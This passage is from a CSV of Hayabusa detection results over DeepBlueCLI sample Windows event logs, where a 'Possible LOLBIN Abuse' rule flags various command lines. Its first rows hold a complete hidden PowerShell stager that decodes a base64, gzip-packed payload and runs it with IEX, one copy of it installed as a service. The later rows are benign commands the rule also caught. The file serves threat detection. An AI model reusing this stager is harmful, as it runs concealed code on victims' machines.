rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
